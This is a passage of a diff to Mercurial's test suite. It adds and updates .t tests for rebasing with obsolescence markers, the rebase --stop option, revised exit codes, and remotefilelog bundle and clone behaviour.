+ | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6)
+ | |/|
+ | o | 3:7fb047a69f22 E
+ | | |
+ | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
+ | |/
+ o | 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of other parent is equal to destination
+
+ $ hg init p2-succ-is-dest
+ $ cd p2-succ-is-dest
+
+ $ hg debugdrawdag <<EOF
+ > F
+ > /|
+ > E D B # replace: E -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d B -s E
+ note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
+ rebasing 4:66f1a38021c9 F tip "F"
+ $ hg log -G
+ o 5:aae1787dacee F
+ |\
+ | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee)
+ | |/|
+ | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
+ | | |
+ | o | 2:b18e25de2cf5 D
+ | |/
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of one parent is ancestor of destination
+
+ $ hg init p1-succ-in-dest
+ $ cd p1-succ-in-dest
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: D -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -s D
+ note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
+ rebasing 5:66f1a38021c9 F tip "F"
+
+ $ hg log -G
+ o 6:0913febf6439 F
+ |\
+ +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439)
+ | | |
+ | o | 4:26805aba1e60 C
+ | | |
+ o | | 3:7fb047a69f22 E
+ | | |
+ +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
+ | |
+ | o 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of other parent is ancestor of destination
+
+ $ hg init p2-succ-in-dest
+ $ cd p2-succ-in-dest
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: E -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -s E
+ note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
+ rebasing 5:66f1a38021c9 F tip "F"
+ $ hg log -G
+ o 6:c6ab0cc6d220 F
+ |\
+ +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220)
+ | | |
+ | o | 4:26805aba1e60 C
+ | | |
+ | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
+ | | |
+ o---+ 2:b18e25de2cf5 D
+ / /
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of one parent is ancestor of destination
+
+ $ hg init p1-succ-in-dest-b
+ $ cd p1-succ-in-dest-b
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: E -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -b F
+ rebasing 2:b18e25de2cf5 D "D"
+ note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
+ rebasing 5:66f1a38021c9 F tip "F"
+ note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
+ $ hg log -G
+ o 6:8f47515dda15 D
+ |
+ | x 5:66f1a38021c9 F (pruned using rebase)
+ | |\
+ o | | 4:26805aba1e60 C
+ | | |
+ | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
+ | | |
+ | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15)
+ | |/
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of other parent is ancestor of destination
+
+ $ hg init p2-succ-in-dest-b
+ $ cd p2-succ-in-dest-b
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: D -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -b F
+ note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
+ rebasing 3:7fb047a69f22 E "E"
+ rebasing 5:66f1a38021c9 F tip "F"
+ note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
+
+ $ hg log -G
+ o 6:533690786a86 E
+ |
+ | x 5:66f1a38021c9 F (pruned using rebase)
+ | |\
+ o | | 4:26805aba1e60 C
+ | | |
+ | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86)
+ | | |
+ | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
+ | |/
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where extinct node has successor that is not an ancestor of
+destination
+
+ $ hg init extinct-with-succ-not-in-dest
+ $ cd extinct-with-succ-not-in-dest
+
+ $ hg debugdrawdag <<EOF
+ > E C # replace: C -> E
+ > | |
+ > D B
+ > |/
+ > A
+ > EOF
+
+ $ hg rebase -d D -s B
+ rebasing 1:112478962961 B "B"
+ note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence
+
+ $ cd ..
+
+ $ hg init p2-succ-in-dest-c
+ $ cd p2-succ-in-dest-c
+
+The scenario here was that B::D were developed on default. B was queued on
+stable, but amended before being push to hg-committed. C was queued on default,
+along with unrelated J.
+
+ $ hg debugdrawdag <<EOF
+ > J
+ > |
+ > F
+ > |
+ > E
+ > | D
+ > | |
+ > | C # replace: C -> F
+ > | | H I # replace: B -> H -> I
+ > | B |/
+ > |/ G
+ > A
+ > EOF
+ 1 new orphan changesets
+
+This strip seems to be the key to avoid an early divergence warning.
+ $ hg --config extensions.strip= --hidden strip -qr H
+ 1 new orphan changesets
+
+ $ hg rebase -b 'desc("D")' -d 'desc("J")'
+ abort: this rebase will cause divergences from: 112478962961
+ (to force the rebase please set experimental.evolution.allowdivergence=True)
+ [20]
+
+Rebase merge where both parents have successors in destination
+
+ $ hg init p12-succ-in-dest
+ $ cd p12-succ-in-dest
+ $ hg debugdrawdag <<'EOS'
+ > E F
+ > /| /| # replace: A -> C
+ > A B C D # replace: B -> D
+ > | |
+ > X Y
+ > EOS
+ 1 new orphan changesets
+ $ hg rebase -r A+B+E -d F
+ note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C"
+ note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D"
+ rebasing 7:dac5d11c5a7d E tip "E"
+ abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f
+ [10]
+ $ cd ..
+
+Rebase a non-clean merge. One parent has successor in destination, the other
+parent moves as requested.
+
+ $ hg init p1-succ-p2-move
+ $ cd p1-succ-p2-move
+ $ hg debugdrawdag <<'EOS'
+ > D Z
+ > /| | # replace: A -> C
+ > A B C # D/D = D
+ > EOS
+ 1 new orphan changesets
+ $ hg rebase -r A+B+D -d Z
+ note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C"
+ rebasing 1:fc2b737bb2e5 B "B"
+ rebasing 3:b8ed089c80ad D "D"
+
+ $ rm .hg/localtags
+ $ hg log -G
+ o 6:e4f78693cc88 D
+ |
+ o 5:76840d832e98 B
+ |
+ o 4:50e41c1f3950 Z
+ |
+ o 2:96cc3511f894 C
+
+ $ hg files -r tip
+ B
+ C
+ D
+ Z
+
+ $ cd ..
+
+ $ hg init p1-move-p2-succ
+ $ cd p1-move-p2-succ
+ $ hg debugdrawdag <<'EOS'
+ > D Z
+ > /| | # replace: B -> C
+ > A B C # D/D = D
+ > EOS
+ 1 new orphan changesets
+ $ hg rebase -r B+A+D -d Z
+ rebasing 0:426bada5c675 A "A"
+ note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C"
+ rebasing 3:b8ed089c80ad D "D"
+
+ $ rm .hg/localtags
+ $ hg log -G
+ o 6:1b355ed94d82 D
+ |
+ o 5:a81a74d764a6 A
+ |
+ o 4:50e41c1f3950 Z
+ |
+ o 2:96cc3511f894 C
+
+ $ hg files -r tip
+ A
+ C
+ D
+ Z
+
+ $ cd ..
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-rebase-obsolete4.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,501 @@
+==========================
+Test rebase with obsolete
+==========================
+
+Enable obsolete
+
+ $ cat >> $HGRCPATH << EOF
+ > [command-templates]
+ > log= {rev}:{node|short} {desc|firstline}{if(obsolete,' ({obsfate})')}
+ > [experimental]
+ > evolution.createmarkers=True
+ > evolution.allowunstable=True
+ > [phases]
+ > publish=False
+ > [extensions]
+ > rebase=
+ > drawdag=$TESTDIR/drawdag.py
+ > strip=
+ > EOF
+
+Test that bookmark is moved and working dir is updated when all changesets have
+equivalents in destination
+ $ hg init rbsrepo && cd rbsrepo
+ $ echo "[experimental]" > .hg/hgrc
+ $ echo "evolution=true" >> .hg/hgrc
+ $ echo root > root && hg ci -Am root
+ adding root
+ $ echo a > a && hg ci -Am a
+ adding a
+ $ hg up 0
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo b > b && hg ci -Am b
+ adding b
+ created new head
+ $ hg rebase -r 2 -d 1
+ rebasing 2:1e9a3c00cbe9 tip "b"
+ $ hg log -r . # working dir is at rev 3 (successor of 2)
+ 3:be1832deae9a b (no-eol)
+ $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now
+ bookmarking hidden changeset 1e9a3c00cbe9
+ (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a)
+ $ hg up 2 && hg log -r . # working dir is at rev 2 again
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol)
+ $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1
+ note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b"
+Check that working directory and bookmark was updated to rev 3 although rev 2
+was skipped
+ $ hg log -r .
+ 3:be1832deae9a b (no-eol)
+ $ hg bookmarks
+ mybook 3:be1832deae9a
+ $ hg debugobsolete --rev tip
+ 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'}
+
+Obsoleted working parent and bookmark could be moved if an ancestor of working
+parent gets moved:
+
+ $ hg init $TESTTMP/ancestor-wd-move
+ $ cd $TESTTMP/ancestor-wd-move
+ $ hg debugdrawdag <<'EOS'
+ > E D1 # rebase: D1 -> D2
+ > | |
+ > | C
+ > D2 |
+ > | B
+ > |/
+ > A
+ > EOS
+ $ hg update D1 -q
+ $ hg bookmark book -i
+ $ hg rebase -r B+D1 -d E
+ rebasing 1:112478962961 B "B"
+ note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2"
+ 1 new orphan changesets
+ $ hg log -G -T '{desc} {bookmarks}'
+ @ B book
+ |
+ | x D1
+ | |
+ o | E
+ | |
+ | * C
+ | |
+ o | D2
+ | |
+ | x B
+ |/
+ o A
+
+Rebasing a merge with one of its parent having a hidden successor
+
+ $ hg init $TESTTMP/merge-p1-hidden-successor
+ $ cd $TESTTMP/merge-p1-hidden-successor
+
+ $ hg debugdrawdag <<'EOS'
+ > E
+ > |
+ > B3 B2 # amend: B1 -> B2 -> B3
+ > |/ # B2 is hidden
+ > | D
+ > | |\
+ > | B1 C
+ > |/
+ > A
+ > EOS
+ 1 new orphan changesets
+
+ $ eval `hg tags -T '{tag}={node}\n'`
+ $ rm .hg/localtags
+
+ $ hg rebase -r $D -d $E
+ rebasing 5:9e62094e4d94 "D"
+
+ $ hg log -G
+ o 7:a699d059adcf D
+ |\
+ | o 6:ecc93090a95c E
+ | |
+ | o 4:0dc878468a23 B3
+ | |
+ o | 1:96cc3511f894 C
+ /
+ o 0:426bada5c675 A
+
+For some reasons (--hidden, directaccess, etc.),
+rebasestate may contain hidden hashes. "rebase --abort" should work regardless.
+
+ $ hg init $TESTTMP/hidden-state1
+ $ cd $TESTTMP/hidden-state1
+
+ $ hg debugdrawdag <<'EOS'
+ > C
+ > |
+ > D B # B/D=B
+ > |/
+ > A
+ > EOS
+
+ $ eval `hg tags -T '{tag}={node}\n'`
+ $ rm .hg/localtags
+
+ $ hg update -q $C
+ $ hg rebase -s $B -d $D
+ rebasing 1:2ec65233581b "B"
+ merging D
+ warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+
+ $ hg debugobsolete $B
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ 1 new orphan changesets
+ $ hg debugobsolete $C
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ cp -R . $TESTTMP/hidden-state2
+
+ $ hg log -G
+ @ 2:b18e25de2cf5 D
+ |
+ | % 1:2ec65233581b B (pruned)
+ |/
+ o 0:426bada5c675 A
+
+ $ hg summary
+ parent: 2:b18e25de2cf5 tip
+ D
+ branch: default
+ commit: 1 modified, 1 added, 1 unknown, 1 unresolved
+ update: 1 new changesets, 2 branch heads (merge)
+ phases: 3 draft
+ rebase: 0 rebased, 2 remaining (rebase --continue)
+
+ $ hg rebase --abort
+ rebase aborted
+
+Also test --continue for the above case
+
+ $ cd $TESTTMP/hidden-state2
+ $ hg resolve -m
+ (no more unresolved files)
+ continue: hg rebase --continue
+ $ hg rebase --continue
+ note: not rebasing 1:2ec65233581b "B", it has no successor
+ note: not rebasing 3:7829726be4dc tip "C", it has no successor
+ $ hg log -G
+ @ 2:b18e25de2cf5 D
+ |
+ o 0:426bada5c675 A
+
+====================
+Test --stop option |
+====================
+ $ cd ..
+ $ hg init rbstop
+ $ cd rbstop
+ $ echo a>a
+ $ hg ci -Aqma
+ $ echo b>b
+ $ hg ci -Aqmb
+ $ echo c>c
+ $ hg ci -Aqmc
+ $ echo d>d
+ $ hg ci -Aqmd
+ $ hg up 0 -q
+ $ echo f>f
+ $ hg ci -Aqmf
+ $ echo D>d
+ $ hg ci -Aqm "conflict with d"
+ $ hg up 3 -q
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+ $ hg rebase -s 1 -d 5
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ 1 new orphan changesets
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 7:7fffad344617 test
+ | c
+ |
+ o 6:b15528633407 test
+ | b
+ |
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | x 2:177f92b77385 test
+ | | c
+ | |
+ | x 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+Test it aborts if unstable csets is not allowed:
+===============================================
+ $ cat >> $HGRCPATH << EOF
+ > [experimental]
+ > evolution.allowunstable=False
+ > EOF
+
+ $ hg strip 6 --no-backup -q
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+ $ hg rebase -s 1 -d 5
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ abort: cannot remove original changesets with unrebased descendants
+ (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets)
+ [20]
+ $ hg rebase --abort
+ saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
+ rebase aborted
+
+Test --stop when --keep is passed:
+==================================
+ $ hg rebase -s 1 -d 5 --keep
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 7:7fffad344617 test
+ | c
+ |
+ o 6:b15528633407 test
+ | b
+ |
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+Test --stop aborts when --collapse was passed:
+=============================================
+ $ cat >> $HGRCPATH << EOF
+ > [experimental]
+ > evolution.allowunstable=True
+ > EOF
+
+ $ hg strip 6
+ saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+ $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d"
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ abort: cannot stop in --collapse session
+ [20]
+ $ hg rebase --abort
+ rebase aborted
+ $ hg diff
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+Test --stop raise errors with conflicting options:
+=================================================
+ $ hg rebase -s 3 -d 5
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop --dry-run
+ abort: cannot specify both --stop and --dry-run
+ [10]
+
+ $ hg rebase -s 3 -d 5
+ abort: rebase in progress
+ (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop')
+ [20]
+ $ hg rebase --stop --continue
+ abort: cannot specify both --stop and --continue
+ [10]
+
+Test --stop moves bookmarks of original revisions to new rebased nodes:
+======================================================================
+ $ cd ..
+ $ hg init repo
+ $ cd repo
+
+ $ echo a > a
+ $ hg ci -Am A
+ adding a
+
+ $ echo b > b
+ $ hg ci -Am B
+ adding b
+ $ hg book X
+ $ hg book Y
+
+ $ echo c > c
+ $ hg ci -Am C
+ adding c
+ $ hg book Z
+
+ $ echo d > d
+ $ hg ci -Am D
+ adding d
+
+ $ hg up 0 -q
+ $ echo e > e
+ $ hg ci -Am E
+ adding e
+ created new head
+
+ $ echo doubt > d
+ $ hg ci -Am "conflict with d"
+ adding d
+
+ $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
+ @ 5: 39adf30bc1be 'conflict with d' bookmarks:
+ |
+ o 4: 9c1e55f411b6 'E' bookmarks:
+ |
+ | o 3: 67a385d4e6f2 'D' bookmarks: Z
+ | |
+ | o 2: 49cb3485fa0c 'C' bookmarks: Y
+ | |
+ | o 1: 6c81ed0049f8 'B' bookmarks: X
+ |/
+ o 0: 1994f17a630e 'A' bookmarks:
+
+ $ hg rebase -s 1 -d 5
+ rebasing 1:6c81ed0049f8 X "B"
+ rebasing 2:49cb3485fa0c Y "C"
+ rebasing 3:67a385d4e6f2 Z "D"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ 1 new orphan changesets
+ $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
+ o 7: 9c86c650b686 'C' bookmarks: Y
+ |
+ o 6: 9b87b54e5fd8 'B' bookmarks: X
+ |
+ @ 5: 39adf30bc1be 'conflict with d' bookmarks:
+ |
+ o 4: 9c1e55f411b6 'E' bookmarks:
+ |
+ | * 3: 67a385d4e6f2 'D' bookmarks: Z
+ | |
+ | x 2: 49cb3485fa0c 'C' bookmarks:
+ | |
+ | x 1: 6c81ed0049f8 'B' bookmarks:
+ |/
+ o 0: 1994f17a630e 'A' bookmarks:
+
--- a/tests/test-rebase-parameters.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-parameters.t Tue Apr 20 11:01:06 2021 -0400
@@ -66,7 +66,7 @@
$ hg rebase --continue --collapse
abort: cannot use collapse with continue or abort
- [255]
+ [10]
$ hg rebase --continue --dest 4
abort: cannot specify both --continue and --dest
@@ -94,15 +94,15 @@
$ hg rebase --rev 'wdir()' --dest 6
abort: cannot rebase the working copy
- [255]
+ [10]
$ hg rebase --source 'wdir()' --dest 6
abort: cannot rebase the working copy
- [255]
+ [10]
$ hg rebase --source 1 --source 'wdir()' --dest 6
abort: cannot rebase the working copy
- [255]
+ [10]
$ hg rebase --source '1 & !1' --dest 8
empty "source" revision set - nothing to rebase
@@ -508,11 +508,11 @@
$ hg rebase -i
abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit")
- [255]
+ [10]
$ hg rebase --interactive
abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit")
- [255]
+ [10]
$ cd ..
--- a/tests/test-rebase-scenario-global.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-scenario-global.t Tue Apr 20 11:01:06 2021 -0400
@@ -266,14 +266,14 @@
$ hg rebase -s 5 -d 6
abort: source and destination form a cycle
- [255]
+ [10]
G onto B - merge revision with both parents not in ancestors of target:
$ hg rebase -s 6 -d 1
rebasing 6:eea13746799a "G"
abort: cannot rebase 6:eea13746799a without moving at least one of its parents
- [255]
+ [10]
$ hg rebase --abort
rebase aborted
@@ -325,9 +325,8 @@
$ hg pull --config phases.publish=True -q -r 6 . # update phase of 6
$ hg rebase -d 0 -b 6
- abort: cannot rebase public changesets
- (see 'hg help phases' for details)
- [10]
+ nothing to rebase
+ [1]
$ hg rebase -d 5 -b 6
abort: cannot rebase public changesets
(see 'hg help phases' for details)
--- a/tests/test-remotefilelog-bgprefetch.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-bgprefetch.t Tue Apr 20 11:01:06 2021 -0400
@@ -29,8 +29,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow --noupdate
streaming all changes
- 2 files to transfer, 776 bytes of data
- transferred 776 bytes in * seconds (*/sec) (glob)
+ 2 files to transfer, 776 bytes of data (no-zstd !)
+ transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !)
+ 2 files to transfer, 784 bytes of data (zstd !)
+ transferred 784 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
@@ -63,6 +65,7 @@
> EOF
$ hg strip tip
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/6b4b6f66ef8c-b4b8bdaf-backup.hg (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ clearcache
$ hg pull
--- a/tests/test-remotefilelog-bundles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-bundles.t Tue Apr 20 11:01:06 2021 -0400
@@ -26,12 +26,12 @@
$ hg strip -r 66ee28d0328c
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob)
- 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
+ 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ hg unbundle .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg
adding changesets
adding manifests
adding file changes
- added 2 changesets with 0 changes to 0 files
+ added 2 changesets with 2 changes to 1 files
new changesets 66ee28d0328c:16db62c5946f
(run 'hg update' to get a working copy)
@@ -51,7 +51,7 @@
Pulling from a shallow bundle
- $ hg strip -r 66ee28d0328c
+ $ hg strip -r 66ee28d0328c --config remotefilelog.strip.includefiles=none
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob)
$ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg
pulling from .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg
@@ -63,12 +63,13 @@
new changesets 66ee28d0328c (1 drafts)
(run 'hg update' to get a working copy)
-Pulling from a full bundle
+Pulling from a full bundle, also testing that strip produces a full bundle by
+default.
$ hg strip -r 66ee28d0328c
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg (glob)
- $ hg pull -r 66ee28d0328c ../fullbundle.hg
- pulling from ../fullbundle.hg
+ $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg
+ pulling from .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg
searching for changes
abort: cannot pull from full bundles
(use `hg unbundle` instead)
--- a/tests/test-remotefilelog-clone-tree.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-clone-tree.t Tue Apr 20 11:01:06 2021 -0400
@@ -30,6 +30,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -71,6 +73,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -91,8 +95,7 @@
# flakiness here
$ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null
streaming all changes
- remote: abort: Cannot clone from a shallow repo to a full repo.
- [255]
+ [100]
# getbundle full clone
@@ -113,6 +116,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-remotefilelog-clone.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-clone.t Tue Apr 20 11:01:06 2021 -0400
@@ -27,6 +27,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -61,6 +63,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -85,9 +89,9 @@
$ TEMP_STDERR=full-clone-from-shallow.stderr.tmp
$ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR
streaming all changes
+ [100]
+ $ cat $TEMP_STDERR
remote: abort: Cannot clone from a shallow repo to a full repo.
- [255]
- $ cat $TEMP_STDERR
abort: pull failed on remote
$ rm $TEMP_STDERR
@@ -110,6 +114,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-remotefilelog-local.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-local.t Tue Apr 20 11:01:06 2021 -0400
@@ -116,7 +116,7 @@
$ hg strip -r .
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/19edf50f4de7-df3d0f74-backup.hg (glob)
- 4 files fetched over 2 fetches - (4 misses, 0.00% hit ratio) over *s (glob)
+ 3 files fetched over 2 fetches - (3 misses, 0.00% hit ratio) over *s (glob)
